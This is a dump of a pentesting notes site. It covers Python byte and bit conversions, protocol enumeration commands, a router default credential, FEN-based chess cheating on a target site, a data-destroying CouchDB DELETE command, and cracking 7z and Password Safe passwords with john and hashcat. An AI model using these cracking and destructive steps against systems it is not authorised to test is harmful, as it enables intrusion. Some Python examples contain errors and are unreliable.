33 | bin(0b0100 | 0b1001)
34 | # 0b1101
35 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/bit-wise-operation/shift-bitwise-operations.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Shift Bitwise Operations
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Basic
12 |
13 | ### Left Bit Shift
14 |
15 | Assume we want to left bit shift the binary **`0100`** as below.
16 |
17 | ```txt
18 | 0100 -> 1000
19 | ```
20 |
21 | We can achieve this using the **`<<`** operator in Python.
22 |
23 | ```python
24 | 0b100 << 1
25 | # 8 ('1000' in binary)
26 |
27 | 4 << 1
28 | # 8 ('1000' in binary)
29 |
30 | # Output as the binary representation
31 | bin(8 << 1)
32 | # 0b1000
33 | ```
34 |
35 | ### Right Bit Shift
36 |
37 | Assume we want to right bit shift the binary **`0100`** as below.
38 |
39 | ```txt
40 | 0100 -> 0010
41 | ```
42 |
43 | We can achieve this using the **`>>`** operator in Python.
44 |
45 | ```python
46 | 0b100 >> 1
47 | # 2 ('10' in binary)
48 |
49 | 4 >> 1
50 | # 2 ('10' in binary)
51 |
52 | bin(4 >> 1)
53 | # 0b10
54 | ```
55 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/_data.yml:
--------------------------------------------------------------------------------
1 | category2: conversion
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-hex-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to Hex in Python
3 | description: Converting bytes to hex is easily done by hex method in python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`hex`** method in Python, we can easily convert bytes to hex.
14 |
15 | ```python
16 | b'Hello World'.hex()
17 | # 48656c6c6f20576f726c64
18 |
19 | b'abcdef'.hex()
20 | # 616263646566
21 |
22 | b'\xe3\x81\xad\xe3\x81\x93'.hex()
23 | # e381ade38193
24 | ```
25 |
26 | By the way, for converting from string to bytes before converting bytes to hex, use **`encode`** method as below.
27 |
28 | ```python
29 | 'Hello World'.encode().hex()
30 | # 48656c6c6f20576f726c64
31 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-int-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to Int in Python
3 | description: Converting bytes to int is easily done by int.from_bytes method in python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Big Endian
14 |
15 | For using big endian, we can specify **"big"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python.
16 |
17 | ```python
18 | int.from_bytes(b'hello', byteorder='big')
19 | # 448378203247
20 |
21 | int.from_bytes(b'\x00\x01', byteorder='big')
22 | # 1
23 | ```
24 |
25 | ### Little Endian
26 |
27 | For using little endian, we can specify **"little"** to the **byteorder** argument (**the second argument**) of **int.from_bytes** method in Python.
28 |
29 | ```python
30 | int.from_bytes(b'hello', byteorder='little')
31 | # 478560413032
32 |
33 | int.from_bytes(b'\x00\x01', byteorder='little')
34 | # 256
35 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-bytes-to-string-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Bytes to String in Python
3 | description: We can decode bytes to string in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`decode`** method in Python, we can easily convert **bytes** to **string**.
14 | There are three types of **`decode`** methods as below.
15 |
16 | All of the results say **"Hello"**.
17 |
18 | ```python
19 | b'Hello'.decode('utf-8')
20 |
21 | bytes.decode(b'Hello', 'utf-8')
22 |
23 | codecs.decode(b'Hello', 'utf-8')
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-character-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Character to Binary in Python
3 | description: We can convert a character to binary using the format method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Character -> N-bit
14 |
15 | Using **`format`** method, the given character is converted to bits.
16 |
17 | ```python
18 | char = 'a'
19 | format(ord(char), 'b')
20 | # 1100001
21 | ```
22 |
23 | ### Character -> 8-bit
24 |
25 | We can specify **8-bit** representation by prepending **`{0:08b}`** before the **`format`** method.
26 |
27 | ```python
28 | char = 'a'
29 | '{0:08b}'.format(ord(char), 'b')
30 | # 01100001
31 | ```
32 |
33 | ### Character -> 16-bit
34 |
35 | We can specify **16-bit** representation by prepending **`{0:016b}`** before the **`format`** method.
36 |
37 | ```python
38 | char = 'a'
39 | '{0:016b}'.format(ord(char), 'b')
40 | # 0000000001100001
41 | ```
42 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-character-to-unicode-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Character to Unicode in Python
3 | description: We can easily convert a character to Unicode using the ord method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can use **`ord`** method in Python to convert a **character** to **Unicode**.
14 |
15 | ```python
16 | ord('a')
17 | # 97
18 | ```
19 |
20 | By the way, use **`chr`** method to convert **Unicode** to a **character**.
21 |
22 | ```python
23 | chr(97)
24 | # a
25 | ```
26 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-hex-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Hex to Bytes in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-09-04
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`bytes.fromhex`** method, we can convert **hex string** to **bytes string**.
14 |
15 | ```python
16 | hex_str = "48656c6c6f20576f726c64"
17 |
18 | bytes.fromhex(hex_str)
19 | # b'Hello World'
20 | ```
21 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Binary in Python
3 | description: Using the format method in Python, we can convert int to binary.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | ### Int -> N-bit
14 |
15 | Specify **'b'** in the **`format`** method in Python.
16 |
17 | ```python
18 | format(123, 'b')
19 |
20 | # 1111011
21 | ```
22 |
23 | ### Int -> 8-bit
24 |
25 | We can specify **`8-bit`** by prepending **`{0:08b}`** before the **`format`** method.
26 | Alternatively, **`zfill`** method can be used for this purpose.
27 |
28 | ```python
29 | '{0:08b}'.format(123, 'b')
30 | format(123, 'b').zfill(8)
31 |
32 | # 01111011
33 | ```
34 |
35 | ### Int -> 16-bit
36 |
37 | This is also the same as above, we can specify **`16-bit`** by prepending **`{0:016b}`**, or **`zfill`** method can be used.
38 |
39 | ```python
40 | '{0:016b}'.format(123, 'b')
41 | format(123, 'b').zfill(16)
42 |
43 | # 0000000001111011
44 | ```
45 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Bytes in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using the **`to_bytes`** built-in method in Python, we can conavert int to bytes.
14 | In addition, we can specify the length to the first argument in **`to_bytes`** method.
15 |
16 | ### Big Endian
17 |
18 | By specifying **'big'** to the **`byteorder`** argument, the result is the **big endian** bytes order.
19 |
20 | ```python
21 | num = 1234
22 |
23 | num.to_bytes(2, byteorder='big')
24 | # b'\x04\xd2'
25 |
26 | num.to_bytes(3, byteforder='big')
27 | # b'\x00\x04\xd2'
28 |
29 | num.to_bytes(4, byteorder='big')
30 | # b'\x00\x00\x04\xd2'
31 | ```
32 |
33 | ### Little Endian
34 |
35 | By specifying **'big'** to the **`byteorder`** argument, the result is the **little endian** bytes order.
36 |
37 | ```python
38 | num = 1234
39 |
40 | num.to_bytes(2, byteorder='little')
41 | # b'\xd2\x04
42 |
43 | num.to_bytes(3, byteorder='little')
44 | # b'\xd2\x04\x00'
45 |
46 | num.to_bytes(4, byteorder='little')
47 | # b'\xd2\x04\x00\x00'
48 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-int-to-hex-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Int to Hex in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can convert int to hex using **`hex`** method in Python.
14 |
15 | ```python
16 | hex(123)
17 | # 0x7b
18 |
19 | hex(448378203247)
20 | # 0x68656c6c6f
21 | ```
22 |
23 | To remove the prefix **`0x`**, exlude the characters from the string with **`[2:]`**.
24 |
25 | ```python
26 | hex(123)[2:]
27 | # 7b
28 |
29 | hex(448378203247)[2:]
30 | # 68656c6c6f
31 | ```
32 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-string-to-binary-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert String to Binary in Python
3 | description:
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | For converting strings to binary, we need to convert each character to binary by first converting the character to Unicode.
14 | Then concatenate these binaries.
15 |
16 | ```python
17 | text = "Hello"
18 |
19 | bin_str = ""
20 | for c in text:
21 | c_bin = bin(ord(c))[2:] # remove "0b" prefix
22 | bin_str += c_bin.zfill(8) # padding to 8-bit for adjustment
23 |
24 | print(bin_str)
25 | # 0100100001100101011011000110110001101111
26 | ```
27 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-string-to-bytes-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert String to Bytes in Python
3 | description: We can encode strings to bytes using Python's built-in methods.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | We can use several ways to encode string to bytes in Python.
14 |
15 | - **string** class has **`encode`** method to encode strings to bytes.
16 | - **bytes** method converts string to bytes.
17 |
18 | Also we can specify the format e.g. **`utf-8`**, **`shift_jis`** as argument.
19 |
20 | ```python
21 | # Using encode() method
22 | "Hello".encode('utf-8')
23 | "Hello".encode('shift_jis')
24 |
25 | # Using bytes() method
26 | bytes("Hello", 'utf-8')
27 | bytes("Hello", 'shift_jis')
28 |
29 | # Result: b'Hello'
30 | ```
31 |
32 | ### Decode Bytes to String
33 |
34 | By the way, we can decode bytes to string with **`decode`** method.
35 |
36 | ```python
37 | b"Hello".decode()
38 | # Hello
39 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/conversion/convert-unicode-to-character-in-python.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Convert Unicode to Character in Python
3 | description: We can easily convert Unicode to character using the chr method in Python.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2023-08-29
8 | draft: false
9 | ---
10 |
11 | ## Conversion
12 |
13 | Using **`chr`** method in Python, we can convert Unicode to a character as below.
14 |
15 | ```python
16 | chr(97)
17 | # a
18 |
19 | chr(98)
20 | # b
21 | ```
22 |
23 | By the way, use **`ord`** method to convert **character** to a **Unicode**.
24 |
25 | ```python
26 | ord('a')
27 | # 97
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/key-derivation-function/_data.yml:
--------------------------------------------------------------------------------
1 | category2: key-derivation-function
--------------------------------------------------------------------------------
/src/exploit/cryptography/key-derivation-function/scrypt.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Scrypt
3 | description: Scrypt is a password-based key derivation function.
4 | tags:
5 | - Cryptography
6 | - Key Derivation Function
7 | refs:
8 | - https://pycryptodome.readthedocs.io/en/latest/src/protocol/kdf.html#scrypt
9 | date: 2023-08-06
10 | draft: false
11 | ---
12 |
13 | ## Using Scrypt in Python
14 |
15 | We can use scrypt easily thanks of Pycryptodome.
16 | We need to install it first.
17 |
18 | ```python
19 | pip install pycryptodome
20 | ```
21 |
22 | Below is a Python script to derive a key from a password with scrypt.
23 |
24 | ```python
25 | from Crypto.Protocol.KDF import scrypt
26 | from Crypto.Random import get_random_bytes
27 |
28 | password = b'secret'
29 | salt = get_random_bytes(16)
30 | key = scrypt(password, salt, 16, N=2**14, r=8, p=1)
31 | print(f"key: {key.hex()}")
32 | ```
33 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/_data.yml:
--------------------------------------------------------------------------------
1 | category2: math
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/exponential.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Exponentiation
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | refs:
8 | - https://en.wikipedia.org/wiki/Exponentiation
9 | date: 2023-09-07
10 | draft: false
11 | ---
12 |
13 | ## Basic
14 |
15 | We can calculate the exponentiation using **'\*\*'** operator in Python.
16 |
17 | ```python
18 | 2 ** 4
19 | # 16
20 |
21 | 6 ** 8
22 | # 1679616
23 | ```
24 |
25 |
26 |
27 | ## Using Pow Method in Python
28 |
29 | The **`pow`** method can be used for the exponentiation.
30 |
31 | ```python
32 | pow(2, 4)
33 | # 2 ** 4 = 16
34 | ```
35 |
36 | ### Modular Exponentiation
37 |
38 | In addition, we can find the remainder of dividing a rased value by a specific number.
39 | This may be sometimes used to find the secret key in **key derivation functions**, etc.
40 |
41 | ```python
42 | pow(2, 4, 6)
43 | # 2 ** 4 % 6 = 4
44 | ```
45 |
46 |
47 |
48 | ## Inverse
49 |
50 | ```python
51 | from Crypto.Util.number import inverse
52 |
53 | inverse(3, 10) # 7
54 | pow(3, -1, 10) # 7
55 | ```
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/modular-congruence.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Modular Congruence
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | - Modular Arithmetic
8 | refs:
9 | - https://cryptohack.org/courses/modular/ma0/
10 | date: 2023-09-02
11 | draft: false
12 | ---
13 |
14 | ## Basic
15 |
16 | In modular congruence, the following rules apply:
17 |
18 | ```txt
19 | If `a ≡ b mod c`, then `b ≡ a mod c`
20 | ```
21 |
22 | So if we have the following problem,
23 |
24 | ```python
25 | 39 ≡ x mod 8
26 | ```
27 |
28 | To find **`x`** value, we can calculate it as below using Python.
29 |
30 | ```python
31 | x = 39 % 8
32 | print(x)
33 | ```
34 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/math/quadratic-residue.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Quadratic Residue
3 | description:
4 | tags:
5 | - Cryptography
6 | - Math
7 | - Modular Arithmetic
8 | refs:
9 | - https://cryptohack.org/courses/modular/root1/
10 | date: 2023-09-02
11 | draft: false
12 | ---
13 |
14 | ## Basic
15 |
16 | An integer **`x`** is called a quadratic residue modulo **`p`**.
17 |
18 | ```python
19 | a**2 = x mod p
20 | ```
21 |
22 | ### Brute Force
23 |
24 | To calculate a quadratic residue, the following Python script is an example for that.
25 |
26 | ```python
27 | p = 71
28 |
29 | for a in range(p):
30 | qr = (pow(a, 2, p))
31 | print(f"a={a} : qr={qr}")
32 | ```
33 |
34 | ### Legendre Symbol
35 |
36 | According to Legendre Symbol, the following rules hold:
37 |
38 | ```python
39 | # `a` is a quadratic residue and `a != 0 mod p`
40 | a**(p-1)/2 mod p == 1
41 |
42 | # `a` is a quadratic non-residue mod p
43 | a**(p-1)/2 mod p == -1
44 |
45 | # `a ≡ 0 mod p`
46 | a**(p-1)/2 mod p == 0
47 | ```
48 |
49 | We can check if an integer is a quadratic residue or not referring to the above.
50 |
51 | ```python
52 | print(pow(a, (p-1)//2, p) == 1)
53 | # If True, `a` is a quadratic resudiue.
54 | ```
55 |
--------------------------------------------------------------------------------
/src/exploit/cryptography/tool/_data.yml:
--------------------------------------------------------------------------------
1 | category2: tool
--------------------------------------------------------------------------------
/src/exploit/cryptography/tool/password-safe-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Password Safe Pentesting
3 | description: Password Save is a password database utility. We may retrieve passwords for users.
4 | tags:
5 | - Cryptography
6 | refs:
7 | date: 2025-03-13
8 | draft: false
9 | ---
10 |
11 | ## Install PasswordSafe Manager
12 |
13 | Go to the [release page](https://github.com/pwsafe/pwsafe/releases) and download it.
14 |
15 | For example, if you use Debian, download `.deb` package and run the following command:
16 |
17 | ```bash
18 | sudo dpkg -i passwordsafe-debian12-x.x-amd64.deb
19 | ```
20 |
21 | ## Analyze `.pwsafe3` file
22 |
23 | ```bash
24 | pwsafe example.pwsafe3
25 | ```
26 |
27 | ## Crack `.pwsafe` Password
28 |
29 | If the password is required to open `.pwsafe` file in the PasswordSafe manger, we might be able to crack the password of the `.pwsafe` file as below:
30 |
31 | ```bash
32 | pwsafe2john example.pwsafe3 > hash.txt
33 | john --wordlist=wordlist.txt hash.txt
34 | ```
35 |
--------------------------------------------------------------------------------
/src/exploit/database/_data.yml:
--------------------------------------------------------------------------------
1 | category1: database
2 | related_menus:
3 | - title: Database
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/database/couchdb-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: CouchDB Pentesting
3 | description: Apache CouchDb is a document-oriented NoSQL database. Default ports are 5984, 6984.
4 | tags:
5 | - Database
6 | refs:
7 | - https://guide.couchdb.org/draft/tour.html
8 | date: 2022-12-28
9 | draft: false
10 | ---
11 |
12 | ## Directories
13 |
14 | ```sh
15 | # List all databases
16 | /_all_dbs
17 |
18 | # Show information of the database
19 | /
20 |
21 | # Futon administration interface
22 | /_utils/
23 | # Temporary View
24 | /_utils/database.html?/_temp_view
25 | ```
26 |
27 |
28 |
29 | ## Basic Operations
30 |
31 | ```sh
32 | # Create a new database
33 | curl -X PUT https://example.com:5984/
34 |
35 | # Delete a database
36 | curl -X DELETE https://example.com:5984/
37 | ```
--------------------------------------------------------------------------------
/src/exploit/database/sqlite-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: SQLite Pentesting
3 | description: SQLite is a database engine.
4 | tags:
5 | - Database
6 | refs:
7 | date: 2024-10-03
8 | draft: false
9 | ---
10 |
11 | ## Interpreter
12 |
13 | ```sh
14 | sqlite3 sample.db
15 | sqlite3 sample.sqlite
16 | sqlitebrowser sample.db
17 | ```
18 |
19 |
20 |
21 | ## Commands
22 |
23 | ```sh
24 | # Help
25 | sqlite> .help
26 |
27 | # Show databases
28 | sqlite> .databases
29 |
30 | # Show tables
31 | sqlite> .tables
32 |
33 | # Show table information
34 | sqlite> PRAGMA table_info(table_name);
35 |
36 | # Dump contents of tables
37 | sqlite> .dump
38 |
39 | # SQL commands to display values in the table
40 | sqlite> SELECT * FROM
;
41 | # Display values in Hex
42 | sqlite> SELECT HEX(column_name) FROM
;
43 |
44 | # Exit the interpreter
45 | sqlite> .quit
46 | ```
--------------------------------------------------------------------------------
/src/exploit/dns/_data.yml:
--------------------------------------------------------------------------------
1 | category1: dns
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/dns/multicast-dns-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: mDNS (Multicast DNS) Pentesting
3 | description: Multicast DNS protocol resolves hostnames to IP addresses within small networks that do not include a local name server. It is a zero-configuration (zeroconf) service. It uses UDP. A default port is 5353.
4 | tags:
5 | - DNS
6 | refs:
7 | date: 2022-12-01
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap -sU --script dns-service-discovery -p 5353
15 | ```
--------------------------------------------------------------------------------
/src/exploit/email/_data.yml:
--------------------------------------------------------------------------------
1 | category1: email
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/email/imap-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: IMAP (Internet Message Access Protocol) Pentesting
3 | description: IMAP is an internet standard protocol used by email clients. Default ports are 143, 993.
4 | tags:
5 | - Email
6 | refs:
7 | date: 2023-03-18
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```sh
14 | nmap --script imap-capabilities -p 143
15 | ```
16 |
17 | ### Banner Grabbing
18 |
19 | ```sh
20 | nc -nv 143
21 | openssl s_client -connect :993 -quiet
22 | ```
23 |
24 |
25 |
26 | ## Connect
27 |
28 | ```bash
29 | telnet 10.0.0.1 143
30 | ```
31 |
32 |
33 |
34 | ## Commands
35 |
36 | ```bash
37 | # Login
38 | a1 login "" ""
39 |
40 | # Logout
41 | a1 logout
42 |
43 | # Close mailbox
44 | a1 close
45 | ```
--------------------------------------------------------------------------------
/src/exploit/email/pop-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: POP (Post Office Protocol) Pentesting
3 | description: Post Office Protocol is an application-layer protocol used by email clients. POP3 is a commonly used version. Default ports are 110, 995.
4 | tags:
5 | - Email
6 | refs:
7 | date: 2023-07-19
8 | draft: false
9 | ---
10 |
11 | ## Enumeration
12 |
13 | ```bash
14 | nmap --script "pop3-capabilities or pop3-ntlm-info" -p 110
15 | ```
16 |
17 |
18 |
19 | ## Connect
20 |
21 | ```bash
22 | nc 110
23 | # or
24 | telnet 110
25 | ```
26 |
27 |
28 |
29 | ## Commands
30 |
31 | ```bash
32 | # Login
33 | USER
34 | PASS
35 |
36 | # Number and total size of all messages
37 | STAT
38 | # List messages and size
39 | LIST
40 | # Retrieve the message of given number
41 | RETR
42 | # Delete the message of given number
43 | DELE
44 | # Reset the mailbox
45 | RSET
46 | # Exit the mail server
47 | QUIT
48 | ```
49 |
--------------------------------------------------------------------------------
/src/exploit/game/_data.yml:
--------------------------------------------------------------------------------
1 | category1: game
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/game/chess-game-cheating.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Chess Game Cheating
3 | description:
4 | tags:
5 | - Game
6 | draft: false
7 | ---
8 |
9 | ## FEN Manipulation
10 |
11 | Forsyth-Edwards Notation (FEN) is a standard notation for describing a particular position of a chess game. The file format is `.fen`.
12 | The [FEN Generator](http://www.netreal.de/Forsyth-Edwards-Notation/index.php) allows us to create a custom FEN string.
13 | For example, below is that our all staffs are queens except the king, and that of the enemy are pawns except the king.
14 |
15 | ```bash
16 | pppkpppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ
17 | # or
18 | ppppkppp/pppppppp/8/8/8/8/QQQQQQQQ/QQQQKQQQ w KQkq - 0 1
19 | ```
20 |
21 | Then paste the FEN string to `.fen` file.
22 | Or paste in the [pastebin](https://pastebin.com/) and click “raw” button then we can get the URL link of the raw mode.
23 | This file can be able to be used for uploading, manipulating in the target website.
24 |
--------------------------------------------------------------------------------
/src/exploit/game/minecraft-server-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Minecraft Server Pentesting
3 | description: A Minecraft server is a player-owned or business-owned multiplayer game server. A default port is 25565.
4 | tags:
5 | - Game
6 | refs:
7 | date: 2023-01-26
8 | draft: false
9 | ---
10 |
11 | ## Run a Server
12 |
13 | ```bash
14 | # Create the screen session
15 | screen -C
16 |
17 | # Reattach to the session
18 | screen -r
19 | ```
20 |
21 |
22 |
23 | ## Commands in the Server
24 |
25 | ```bash
26 | # Print usage
27 | help
28 | ```
29 |
--------------------------------------------------------------------------------
/src/exploit/hardware/_data.yml:
--------------------------------------------------------------------------------
1 | category1: hardware
2 | related_menus:
3 | - title: Others
4 | id: others
--------------------------------------------------------------------------------
/src/exploit/hardware/gerber-files.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gerber (GBR) Files
3 | description: The Gerber format is an ASCII, vector format for printed circuit board (PCB) designs.
4 | tags:
5 | - Hardware
6 | refs:
7 | date: 2023-03-23
8 | draft: false
9 | ---
10 |
11 | ## Gerber Viewer
12 |
13 | There are many online tools to view GBR file.
14 |
15 | - [Online Gerber Viewer](https://www.pcbway.com/project/OnlineGerberViewer.html)
--------------------------------------------------------------------------------
/src/exploit/hardware/netgear-pentesting.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: NETGEAR Pentesting
3 | description: NETGEAR produces networking hardware for consumers, businesses, and service providers.
4 | tags:
5 | - Hardware
6 | - IoT
7 | refs:
8 | date: 2023-01-06
9 | draft: false
10 | ---
11 |
12 | ## Enumeration
13 |
14 | ```sh
15 | nmap --script modbus-discover --script-args modbus-discover.aggressive=true -p 502
16 | ```
17 |
18 |
19 |
20 | ## Default Credentials
21 |
22 | ```txt
23 | admin:password
24 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/_data.yml:
--------------------------------------------------------------------------------
1 | category1: linux
2 | related_menus:
3 | - title: Privilege Escalation
4 | id: privilege-escalation
5 | - title: Post Exploitation
6 | id: post-exploitation
7 | - title: Backup
8 | id: backup
9 | - title: Container
10 | id: container
11 | - title: Archive
12 | id: archive
13 | - title: Attack
14 | id: attack
15 | - title: Protocol
16 | id: protocol
17 | - title: Management
18 | id: management
--------------------------------------------------------------------------------
/src/exploit/linux/archive/7z.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: 7z
3 | description: The 7z command is a compression utility that is used to compress and decompress files in Unix, Linux, and other operating systems.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | # a: Add files to archive
15 | 7z a example.zip example.txt
16 | # With password
17 | 7z a example.zip example.txt -p password
18 | ```
19 |
20 |
21 |
22 | ## Decompress
23 |
24 | ```sh
25 | # e: Extract files from archive
26 | 7z e example.zip
27 | # With password
28 | 7z e example.zip -p password
29 | ```
30 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/_data.yml:
--------------------------------------------------------------------------------
1 | category2: archive
--------------------------------------------------------------------------------
/src/exploit/linux/archive/bzip-bunzip.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Bzip2 & Bunzip2
3 | description: Bzip2 command is a compression utility in Unix, Linux and other operating systems. It is used to compress and decompress files to reduce their size.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | bzip2 example.txt
15 | ```
16 |
17 |
18 |
19 | ## Decompress
20 |
21 | ```sh
22 | bzip2 -d example.txt.bz2
23 | bunzip2 example.txt.bz2
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/crack-7z-password.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Crack 7z Password
3 | description: If a 7z file is protected with password, we can crack the password.
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2024-12-18
8 | draft: false
9 | ---
10 |
11 | ## Crack
12 |
13 | ### 1. Convert to Hash
14 |
15 | First we need to convert the `.7z` file to hash.
16 |
17 | ```sh
18 | 7z2john example.7z > hash.txt
19 | # or
20 | /usr/share/john/7z2john.pl example.7z > hash.txt
21 | ```
22 |
23 | If we got the error “`Can't locate Compress/Raw/Lzma.pm in @INC`...”, we need to install `libcompress-raw-lzma-perl` package so try:
24 |
25 | ```bash
26 | sudo apt install libcompress-raw-lzma-perl
27 | ```
28 |
29 | ### 2. Crack the Hash
30 |
31 | Now we can crack the hash with one of the commands below:
32 |
33 | ```sh
34 | john --wordlist=wordlist.txt hash.txt
35 | # or
36 | hashcat -m 11600 hash.txt wordlist.txt
37 | ```
38 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/gzip-gunzip.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Gzip & Gunzip
3 | description: Gzip command is a utility that is used to compress and decompress files to reduce their size. The name "gzip" stands for "GNU zip".
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Compress
12 |
13 | ```sh
14 | gzip example.txt
15 | ```
16 |
17 |
18 |
19 | ## Decompress
20 |
21 | ```sh
22 | gzip -d example.txt.gz
23 | gunzip example.txt.gz
24 | ```
25 |
--------------------------------------------------------------------------------
/src/exploit/linux/archive/tar.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Tar
3 | description: Tar command is a utility that is used to create, manipulate, and extract archived files. "tar" stands for "tape archive".
4 | tags:
5 | - Archive
6 | refs:
7 | date: 2023-03-28
8 | draft: false
9 | ---
10 |
11 | ## Archive Files
12 |
13 | ```sh
14 | # -c: Create a new archive
15 | # -f: Use archive file
16 | tar -cf archive.tar example.txt
17 | tar -cf archive.tar example1.txt example2.txt
18 | # -z: filter the archive through gzip
19 | tar -zcf example.tar.gz example/
20 | ```
21 |
22 |
23 |
24 | ## Extract Files
25 |
26 | ```sh
27 | # -x: Extract files from an archive
28 | # -f: Use archive file
29 | tar -xf archive.tar
30 | tar -xf archive.tar.gz
31 | # output given directory
32 | tar -xf archive.tar --directory archived
33 | ```
34 |
35 |
36 |
37 | ## Display Contents without Extracting
38 |
39 | ```sh
40 | tar -tf archive.tar
41 | ```
--------------------------------------------------------------------------------
/src/exploit/linux/attack/_data.yml:
--------------------------------------------------------------------------------
1 | category2: attack
--------------------------------------------------------------------------------
/src/exploit/linux/attack/fork-bomb.md:
--------------------------------------------------------------------------------
1 | ---
2 | title: Fork Bomb
